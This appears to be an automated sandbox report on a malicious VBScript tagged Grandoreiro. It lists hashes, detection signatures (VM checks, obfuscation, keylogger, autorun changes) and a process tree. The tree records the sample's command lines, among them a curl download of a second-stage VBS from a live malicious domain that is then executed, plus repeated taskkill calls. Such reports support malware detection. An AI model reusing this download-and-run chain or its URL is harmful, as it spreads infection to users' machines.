Edit tour
Windows
Analysis Report
6724c67fe2634.vbs
Overview
General Information
| Sample name: | 6724c67fe2634.vbs |
| Analysis ID: | 1546861 |
| MD5: | f4d4a3437a2f99adbd156efe75869449 |
| SHA1: | f4cd509d6e01e5e0d0cc7aae1215882c6210f870 |
| SHA256: | 3d6059107932e446d3fd97b00acd7300cfd00734e1dc992f1a4d8867de00d8e2 |
| Tags: | geoGrandoreiroMEXPRTvbsuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
wscript.exe (PID: 6788 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\6724c 67fe2634.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 4592 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6724c6 7fe2636.vb s https:// analisardo cumento.co m/6724c67f e2573/6724 c67fe2636. vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 6656 cmdline: curl -k -o C:\Users\ Public\672 4c67fe2636 .vbs https ://analisa rdocumento .com/6724c 67fe2573/6 724c67fe26 36.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 6396 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724c67fe26 36.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5052 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724c67fe 2636.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
CSRPS.exe (PID: 6204 cmdline: "C:\_6724c 67fe2573\C SRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - cmd.exe (PID: 6776 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2616 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7564 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8076 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4676 cmdline:
cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 5260 cmdline:
ipconfig / flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - Conhost.exe (PID: 5612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5176 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7612 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8040 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6252 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5556 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7820 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4404 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6020 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7704 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7288 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4180 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7736 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8124 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 320 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7532 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7972 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 1264 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7696 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8132 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 5136 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7544 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7948 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7084 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 1292 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7680 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8032 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7192 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7688 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7964 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4024 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7260 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7752 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8156 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7364 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7624 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8116 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7400 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7788 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1628 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7432 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4c67fe2573 \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7796 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8176 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6392 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724c67fe26 36.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6648 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724c67fe 2636.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Binary or memory string: | memstr_19707715-6 | |
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 12_2_6F85C2D0 | |
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | JA3 fingerprint: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||